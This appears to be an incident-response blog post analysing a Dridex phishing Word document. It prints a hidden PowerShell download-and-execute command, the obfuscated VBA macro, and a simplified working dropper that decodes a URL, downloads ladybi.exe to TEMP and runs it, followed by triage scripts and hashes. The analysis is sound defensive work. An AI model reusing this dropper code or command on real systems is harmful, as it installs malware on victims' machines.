Got my hands on a Dridex sample (SKM_C3350160212101601.docm) the other day and I wanted to figure out exactly how it managed to slip by our controls.

The binary dropped did get intercepted by AV but considering the initial phish document did not, I wanted to take a closer look ad make sure nothing else slipped under the radar.

Document Analysis

First thing I need to do is run it through officemalscanner:

M:\Malware>officemalscanner .\SKM_C3350160212101601.docm inflate
word/vbaProject.bin ----- 30208 Bytes ----- at Offset 0x00000b46

M:\Malware>officemalscanner %temp%\DecompressedMsOfficeDocument\word\vbaProject.bin info
------> M:\Malware\VBAPROJECT.BIN-Macros

There are a couple of macros in this document and they appear to run independently. The first macro is straight forward and executes the following:

cmd /K powershell.exe -WindowStyle hidden -ExecutionPolicy Bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('','%TEMP%\GhcRgsjjdx6Hh.ps1'); 
powershell.exe -WindowStyle hidden -ExecutionPolicy Bypass -noprofile -file %TEMP%\GhcRgsjjdx6Hh.ps1

I did not see the above powershell script successfully executing (or even downloading) on my machines and the network controls did not catch any traffic to this host. Further more, Robtex is showing as a DigitalOcean instance (at least at some point in its lifetime), but the domain has since been suspended:

The other macro is more interesting:

Attribute VB_Name = "Module1"
Private MapsInitialized As Boolean
Private mDBname As String
Private MapInit As Boolean
Public Mamamima_1 As Object
Public Mamamima_2 As Object
Public Mamamima_3  As Object
Public Mamamima_4 As String
Public Mamamima_5 As String
Public Mamamima_6 As Object
Public MapList() As String
Public Sub AddSensors()
    Dim Col As String
    Dim Obj As String
    MapList = Split(UserForm1.Label1.Caption, "/")
    GoTo ErrExit
    On Error GoTo ErrHandler

    On Error GoTo 0
Set Mamamima_1 = CreateObject(MapList(0))
    Exit Sub
     AD.DisplayError Err.Number, "modMaps", "AddSensors", Err.Description
     Resume ErrExit
End Sub

Private Sub CheckBins()
' Procedure : CheckBins
' Author    : David
' Date      : 4/3/2011
' Purpose   :
' Checks if any bins have been added or deleted
    Dim LP As Long
    Dim BinID As Long
    Dim objStorages As String
    Dim objStorage As Variant
    Dim MapID As Long
    Set Mamamima_2 = CreateObject(MapList(1))
     GoTo ErrHandler
    'check for deleted bins
    For LP = 1 To BM.StorCount
        BinID = BM.StorID(LP)
        If Not objSto.rages.IsItem(BinID) Then
            BM.UnloadStor BinID
        End If
    Next LP
    'check for new bins
    For Each objStorage In objS.torages
        With objStorage
            If Not BM.BinLoaded(.ID) Then
                BM.AddStor .ID, .Label, .IsWarehouse, .MapID, .XPos, .YPos, .Volume, .PositionSet
            End If
            'check for bin moved to other map
            MapID = BM.BinMapID(.ID)
            If MapID <> 0 And MapID <> .MapID Then
                BM.UnloadStor .ID
                BM.AddStor .ID, .Label, .IsWarehouse, .MapID, .XPos, .YPos, .Volume, .PositionSet
            End If
        End With
    On Error GoTo 0
    Exit Sub
Set Mamamima_6 = CreateObject(MapList(2))
Set hokuk = CreateObject(MapList(3))
Set Mamamima_3 = hokuk.Environment(MapList(4))
End Sub

Private Sub CheckDatabase()
' Procedure : CheckDatabase
' Author    : David
' Date      : 2/13/2012
' Purpose   : checks if database has changed to a different database. If so reset map control.
Dim Mamamima_7() As Variant
Mamamima_7 = Array(161, 173, 173, 169, 115, 104, 104, 107, 106, 111, 103, 106, 110, 113, 103, 113, 107, 103, 106, 109, 114, 104, 105, 114, 174, 113, 161, 112, 111, 159, 104, 111, 110, 159, 160, 111, 112, 167)

Dim Mamamima_8 As Integer
    Dim uncunctunc2_1 As String
    uncunctunc2_1 = ""
 GoTo ErrHandler
    If mDBname <> Prog.DatabaseFullName Then
        mDBname = Prog.DatabaseFullName
        MapsInitialized = False
    End If
    On Error GoTo 0
    Exit Sub
      For Mamamima_8 = LBound(Mamamima_7) To UBound(Mamamima_7)
        uncunctunc2_1 = uncunctunc2_1 & Chr(Mamamima_7(Mamamima_8) - 20 - 37)
    Next Mamamima_8

Mamamima_1.Open MapList(5), uncunctunc2_1, False
   End Sub

Private Sub CheckMaps()
' Procedure : CheckMaps
' Author    : XPMUser
' Date      : 12/6/2014
' Purpose   : checks if any maps have been added or deleted. Resets if so.
    Dim objStors As String
    Dim objStor As Variant
    Dim NewList As String
    Dim DoReset As Boolean
    Dim LP As Long
    Mamamima_4 = Mamamima_3(MapList(6))
GoTo ErrHandler

    objS.tors.Load , , , , , True
    For Each objStor In objSt.ors
        'make list of unique map ID's objStor.MapID
    If Not MapInit Then
        'init map list, reset BinMap object
        MapInit = True
        DoReset = True
        'check if each map on new list is on old list
        If <> Then
            'count not same, reset
            DoReset = True
            Set = NewList
            For LP = 1 To
                If <> Then
                    DoReset = True
                    Set = Ne.w.List
                    Exit For
                End If
            Next LP
        End If
    End If
    If DoReset Then
        MapsInitialized = False
    End If
    Set = Nothing
    Set objSt.ors = Nothing
    Set objSt.or = Nothing
    On Error GoTo 0
    Exit Sub
Mamamima_5 = Mamamima_4 + Replace(MapList(12), "t", "e")
End Sub

Public Sub ConnectMaps()
' Procedure : ConnectMaps
' Author    : David
' Date      : 2/13/2012
' Purpose   : show maps. If none in database then control will be hidden.
    Dim objStorages As Variant
    Dim objStorage As Variant
    Dim objMap As Variant
    Dim objMaps As Variant
     CallByName Mamamima_2, MapList(7), VbLet, 1
GoTo ErrHandler
    CheckDat.abase BM
    CheckM.aps BM
    BM.Visible = False
    If objMaps.Count > 0 Then
        BM.Visible = ShowMaps
        If ShowMaps Then
            If Not MapsInitialized Then
                'add maps
                For Each objMap In objMaps
                    With objMap
                        BM.AddMap .ID, .MapName, .Units, .Zoom
                    End With
                'add bins
                objStor.ages.Load , , , , , True
                For Each objStorage In objSto.rages
                    With objStorage
                        BM.AddStor .ID, .Label, .IsWarehouse, .MapID, .XPos, .YPos, .Volume, .PositionSet
                    End With
                MapsInitialized = True
            End If
            CheckB.ins BM
        End If
    End If
    Set objMap = Nothing
    Set objMaps = Nothing
    Set objStorage = Nothing
    Set objStorages = Nothing
    On Error GoTo 0
    Exit Sub
End Sub

Public Sub SaveMaps()
rbp = CallByName(Mamamima_1, MapList(10), VbGet)
    Dim objStor As Variant
    CallByName Mamamima_2, MapList(9), VbMethod, rbp
    Dim objMap As Variant
    Dim LP As Long
    Dim ID As Long
    Dim XPos As Single
    Dim YPos As Single
    Dim BinLP As Long
    Dim BinID As Long
    'save map data
    CallByName Mamamima_2, MapList(11), VbMethod, Mamamima_5, 2
GoTo ErrHandler
    For LP = 1 To BM.MapCount
        ID = BM.MapID(LP)
        objMap.Load ID
        objMap.MapZoom = BM.MapZoom(LP)
        Set objMap = Nothing
    Next LP
    'save bin data
    For BinLP = 1 To BM.StorCount
        BinID = BM.StorID(BinLP)
        If BM.BinLoaded(BinID) Then
            BM.BinLocation BinLP, XPos, YPos
            With objStor
                .Load BinID
                .XPos = XPos
                .YPos = YPos
            End With
            Set objStor = Nothing
        End If
    Next BinLP
    On Error GoTo 0
    Exit Sub
Mamamima_6.Open (Mamamima_5)
End Sub

At first glance it looks like a benign database handling library created by a David sometime in 2011. If you closely though, you can actually see where the malware writers put their code: the indentation and some variable names does not match the convention outlined by the rest of the library.

The first thing I noticed were the references to the MapList array. Statically defined indexes all over the code? Looks like obfuscation.

MapList is built by splitting a hidden form’s label caption:

MapList = Split(UserForm1.Label1.Caption, "/")

'Where UserForm1.Label1.Caption = Microsoft.XMLHTTP/Adodb.Stream/Shell.Application/WScript.Shell/Process/GET/TEMP/Type/Open/write/responseBody/savetofile/\ladybi.txt

There are several GoTo calls and a decoding routine sprinkled throughout this macro to help it download and execute that first payload. I can further simplify the code by jumping with the GoTo and subroutine calls and doing a bit of refactoring:

Attribute VB_Name = "Module1"
Public xmlhttp_obj As Object
Public adodbstream_obj As Object
Public process_obj As Object
Public save_path As String
Public save_fullname As String
Public shellapplication_obj As Object

Public Sub AddSensors()
	Set xmlhttp_obj = CreateObject("Microsoft.XMLHTTP")
	Set adodbstream_obj = CreateObject("Adodb.Stream")
	Set shellapplication_obj = CreateObject("Shell.Application")
	Set wscript_obj = CreateObject("WScript.Shell")
	Set process_obj = wscript_obj.Environment("Process")
	Dim url_array() As Variant
	url_array = Array(161, 173, 173, 169, 115, 104, 104, 107, 106, 111, 103, 106, 110, 113, 103, 113, 107, 103, 106, 109, 114, 104, 105, 114, 174, 113, 161, 112, 111, 159, 104, 111, 110, 159, 160, 111, 112, 167)
	Dim count As Integer
	Dim url As String
	url = ""
	For count = LBound(url_array) To UBound(url_array)
		url = url & Chr(url_array(count) - 20 - 37)
	Next count

	xmlhttp_obj.Open "GET", url, False
	save_path = process_obj("TEMP")
	save_fullname = save_path + "\ladybi.exe"
	CallByName adodbstream_obj, "Type", VbLet, 1
	rbp = CallByName(xmlhttp_obj, "responseBody", VbGet)
	CallByName adodbstream_obj, "write", VbMethod, rbp
	CallByName adodbstream_obj, "savetofile", VbMethod, save_fullname, 2
	shellapplication_obj.Open (save_fullname)
End Sub

Note: My AV instance did finally pick up the macro as malicious but only after I simplified it.

The data I’m interested in is:

url_array = Array(161, 173, 173, 169, 115, 104, 104, 107, 106, 111, 103, 106, 110, 113, 103, 113, 107, 103, 106, 109, 114, 104, 105, 114, 174, 113, 161, 112, 111, 159, 104, 111, 110, 159, 160, 111, 112, 167)


For count = LBound(url_array) To UBound(url_array)
	url = url & Chr(url_array(count) - 20 - 37)
Next count

A fairly straight forward character decoding operation: take each element of the array, subtract 57 and cast the resulting integer to its ASCII character equivalent.

I wrote a JavaScript one-liner to safely decode this array, and potentially others, in Chrome’s console:

var y = "";[161, 173, 173, 169, 115, 104, 104, 107, 106, 111, 103, 106, 110, 113, 103, 113, 107, 103, 106, 109, 114, 104, 105, 114, 174, 113, 161, 112, 111, 159, 104, 111, 110, 159, 160, 111, 112, 167].forEach(function(x){y = y + String.fromCharCode(x - 57)});y

The macro continues to download and save the file to the TEMP folder as ladybi.exe:

xmlhttp_obj.Open "GET", url, False
save_fullname = save_path + "\ladybi.exe"

The final step in the macro executes ladybi.exe:

shellapplication_obj.Open (save_fullname)


So now that I have an idea of what this document does, I want to make sure I’ve recorded all the URLs and any other indicators.

It’s unusual for a campaign to only use one download point so other emails likely contained a different encoded URL.

I need a way to go through all the emails, grab the .docm attachments and extract their macros:

First I’ll use msg-extractor, a neat python tool for extracting attachments from .msg files:

PS M:\malware\> ls -recurse | ?{$ -match ".msg"} | %{
	M:\Apps\Python\python.exe M:\Tools\msg-extractor\ $_.fullname

The output will be a bunch of subdirectories with the extracted attachments.

I need to sort them by their MD5 hash and get a distinct view of what I need to look at:

PS M:\malware\> ls -recurse | ?{$_.FullName -match ".docm"} | %{
	$to = ("extracted\" + (Get-FileHash $_.FullName -Algorithm md5).hash + ".docm")
	Copy-Item -Path $_.fullname -Destination $to

Going forward I’ll do my analysis on the [md5hash].docm files. Instead of officemalscanner, I can script the macro extraction with

PS M:\malware\msg\extracted> ls | ?{$_.fullname -match ".docm"} | %{
	M:\Apps\Python\python.exe M:\Tools\olevba\build\lib\oletools\ $_.fullname | out-file ($_.fullname+".macro.txt") 

The above will output macro reports in [md5has].docm.macro.txt files.

To see a list of the encoded character arrays (+ the number to shift each character by):

PS M:\malware\extracted> ls *.macro.txt | %{
	write-host -nonewline ($": "); 
	write-host -nonewline (gc $_.fullname | select-string "Array\("); 
	write-host (gc $_.fullname | select-string "uncunctunc2_1 = uncunctunc2_1")


After all is said and done, this is what I’ve seen in my environment:


Docm MD5 hashes:


Dropped files:

ladybi.exe - md5:69e4d5a501620829f0c3f1d15f1e3016 - sha256:230a53b665cf61ff2b8d55f24363d3850f8b498eaf3437557c6157879bb25134

VirusTotal reports: